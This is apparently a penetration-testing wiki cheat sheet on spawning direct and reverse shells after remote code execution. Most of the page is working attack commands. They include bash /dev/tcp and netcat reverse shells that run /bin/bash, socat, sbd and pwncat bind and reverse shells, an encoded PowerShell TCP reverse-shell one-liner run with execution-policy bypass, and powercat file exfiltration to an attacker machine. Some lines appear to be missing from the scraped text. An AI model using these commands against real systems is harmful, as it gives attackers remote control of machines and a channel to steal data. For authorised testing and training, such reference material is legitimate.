Direct and reverse shells

Penetration Testing Wiki

Once we are able to execute code remotely using a known vulnerability, executing code from a SQL injection, or even through a RFI (Remote File Inclusion) it is extremely important to continue further with more advanced post-exploitation phases to be able to spawn a shell.

Direct shells are used when the compromised machine is directly reacheable from Internet and the firewall allows incoming traffic (INGRESS filtering) to that specific port.

We use reverse shells in most of the cases, because the compromised machine is sitting inside a LAN or it has several layers of security. One of the perks of reverse shells is that usually firewalls do not limit outgoing traffic (EGRESS filtering).

Classic methods to spawn remote shells


How to trigger a bash reverse shell:

On attacker:

nc -nvv -lp 8080

On target:

bash -i >& /dev/tcp/$IP/8080 0>&1


How to trigger a netcat bindshell:

On target:

nc -nvvlp 8989 -e /bin/bash

On attacker:

nc -nvv $IP 8989

How to trigger a netcat reverse shell:

On attacker:

nc -nvvlp 8989 $IP

On target:

nc -nvv $IP 8989 -e /bin/bash
stty raw -echo
  • To improve interactive shell (Method 2):
python -c 'import pty; pty.spawn("/bin/bash")'



socat [options] address1 address2

Examples of address:

  • stdio
  • tcp4:localhost:1080
  • tcp4-listen:8080 = tcp-l:8080
  • udp4:host:2049
  • udp4-l:500
  • exec:/bin/ls,pty
  • socks:socks.local:$IP:80
  • proxy:proxy.local:$IP:443
  • ssl-l:443,cert=./server.pem
  • open:file.txt
  • create:newfile.txt
  • UDP4-DATAGRAM:,bind=:9999,range=
  • TUN:,iff-up=1

How to trigger a bindshell with Socat:

On target:

socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane

On attacker:

socat FILE:`tty`,raw,echo=0 TCP:$IP:1337

How to trigger a reverse shell with Socat:

On attacker:

socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0

On target:

socat TCP4:$IP:1337 EXEC:bash,pty,stderr,setsid,sigint,sane


pwncat -l 4444

Bind shell:

pwncat -l -e '/bin/bash' 8080 -k

Reverse shell:

pwncat -e '/bin/bash' 4444 --reconn --recon-wait 1

Direct shell with mosh

Mosh allows resillient sessions for low signal or servers with intermittent connectivity.

mosh --ssh="ssh -p 2222"

More info:

How to trigger a direct or reverse shell with Msfvenom:

Learn how to spawn remote shells with Metasploit Msfvenom in Msfvenom Payloads Cheat Sheet.

How to trigger a direct or reverse shell with sbd:


connect (tcp): sbd [-options] host port
listen (tcp):  sbd -l -p port [-options]

Spawn a bindshell on port 4444 on target:

sbd -l -p 4444 -e bash -v -n

Connect to the bindshell from the attacker:

sbd 4444

Build a VPN with socat:

On server:

socat tcp-l:50500 TUN:,iff-up=1

On client:

socat tcp:50500 TUN:,iff-up=1

Windows Powershell Direct shell

$str='$client=New-Object System.Net.Sockets.TCPClient("'+$LHOST+'",'+$LPORT+');$stream= $client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data =(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String );$sendback2=$sendback+"PS "+(pwd).Path+"> ";$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
echo "powershell -ep bypass -nop -encodedcommand $b" | clip

Then directly paste (Ctrl+V) in the target terminal.

USB man-in-the-middle

  • proxy USB over IP


socat /dev/ttyUSB0,raw,echo=0 tcp-listen:1337,reuseaddr


socat PTY,raw,echo=0,link=/dev/ttyVUSB0 tcp:$TARGET:1337


Tiny SHell is an open-source UNIX backdoor (C language)

Powershell modules


Powercat offers netcat functionality with powershell. No packages required. Good for data exfiltration.

In target:

powershell -exec bypass
Import-Module .\powercat.ps1
powercat -l 80 -i input.txt -c $IP

In attacker machine:

nc -vvlp 80 > input.txt




python generate AbC /var/www/html/AbC.txt

Learn how to create webshells with Metasploit Msfvenom in Msfvenom payloads Cheat Sheet.